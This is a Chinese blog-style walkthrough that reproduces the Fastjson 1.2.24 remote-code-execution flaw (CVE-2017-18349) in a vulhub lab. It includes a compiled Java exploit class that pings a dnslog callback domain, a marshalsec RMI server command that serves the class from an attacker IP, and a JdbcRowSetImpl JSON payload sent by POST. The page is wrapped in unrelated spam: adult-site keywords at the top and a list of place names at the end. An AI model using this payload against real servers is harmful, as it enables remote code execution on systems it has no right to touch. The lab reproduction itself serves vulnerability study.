中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

怎么分析Fastjson 1.2.24-rce漏洞(CVE-2017-18349)復現

發布時間:2021-12-14 10:23:05 來源:億速云 閱讀:477 作者:柒染 欄目:安全技術

這篇文章將為大家詳細講解有關怎么分析Fastjson 1.2.24-rce漏洞(CVE-2017-18349)復現,文章內容質量較高,因此小編分享給大家做個參考,希望大家閱讀完這篇文章后對相關知識有一定的了解。

JSON,全稱:JavaScript Object Notation,作為一個常見的輕量級的數據交換格式,應該在一個程序員的開發生涯中是常接觸的。簡潔和清晰的層次結構使得 JSON 成為理想的數據交換語言。 易于人閱讀和編寫,同時也易于機器解析和生成,并有效地提升網絡傳輸效率。

漏洞影響范圍:fastjson<=1.2.24

下面僅作漏洞復現記錄與實現,利用流程如下:

一、漏洞環境搭建

本文漏洞環境采用vulhub搭建,執行以下命令開啟環境

cd /vulhub/fastjson/1.2.24-rce/

docker-compose up -d

執行完畢后訪問8090端口,訪問如下:

怎么分析Fastjson 1.2.24-rce漏洞(CVE-2017-18349)復現

漏洞鏈接:http://192.168.101.152:8090/

攻擊機IP:192.168.101.131

二、漏洞復現

首先將exp進行編譯,將以下內容保存為TouchFile.java

import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
  static {
      try {
          Runtime rt = Runtime.getRuntime();
          String[] commands = {"ping", "test.3ztjrz.dnslog.cn"};
          Process pc = rt.exec(commands);
          pc.waitFor();
      } catch (Exception e) {
          // do nothing
      }
  }
}

怎么分析Fastjson 1.2.24-rce漏洞(CVE-2017-18349)復現

之后使用javac編譯為class文件,最好是用低版本的java編譯,高版本可能利用不了,這里使用的是1.8版本

怎么分析Fastjson 1.2.24-rce漏洞(CVE-2017-18349)復現

編譯完成后會得到一個TouchFile.class文件,然后在同目錄下用python開啟http服務,執行以下命令

python -m http.server 8000

怎么分析Fastjson 1.2.24-rce漏洞(CVE-2017-18349)復現

然后借助marshalsec項目,啟動一個RMI服務器,監聽9999端口,并制定加載遠程類TouchFile.class,執行以下命令

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.101.131:8000/#TouchFile" 9999

怎么分析Fastjson 1.2.24-rce漏洞(CVE-2017-18349)復現

之后使用burp發送特定poc數據包

POST / HTTP/1.1
Host: 192.168.101.152:8090
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8



{
  "b":{
      "@type":"com.sun.rowset.JdbcRowSetImpl",
      "dataSourceName":"rmi://192.168.101.131:9999/TouchFile",
      "autoCommit":true
  }
}

怎么分析Fastjson 1.2.24-rce漏洞(CVE-2017-18349)復現

稍等一下可以可以看到訪問152機子的請求

怎么分析Fastjson 1.2.24-rce漏洞(CVE-2017-18349)復現

怎么分析Fastjson 1.2.24-rce漏洞(CVE-2017-18349)復現

過一會兒就可以看到dnslog收到了請求

怎么分析Fastjson 1.2.24-rce漏洞(CVE-2017-18349)復現

命令執行成功

關于怎么分析Fastjson 1.2.24-rce漏洞(CVE-2017-18349)復現就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

大渡口区| 定日县| 霍林郭勒市| 安吉县| 沂水县| 穆棱市| 千阳县| 连云港市| 海淀区| 大冶市| 日土县| 桐庐县| 澄迈县| 日照市| 贞丰县| 宣武区| 观塘区| 大田县| 新干县| 淮滨县| 惠安县| 巨野县| 姜堰市| 北票市| 夏河县| 泾阳县| 安溪县| 鄂托克前旗| 宜兰市| 岳池县| 蒙山县| 乌拉特中旗| 华宁县| 文成县| 日喀则市| 钟山县| 抚宁县| 思茅市| 疏附县| 兰西县| 永康市|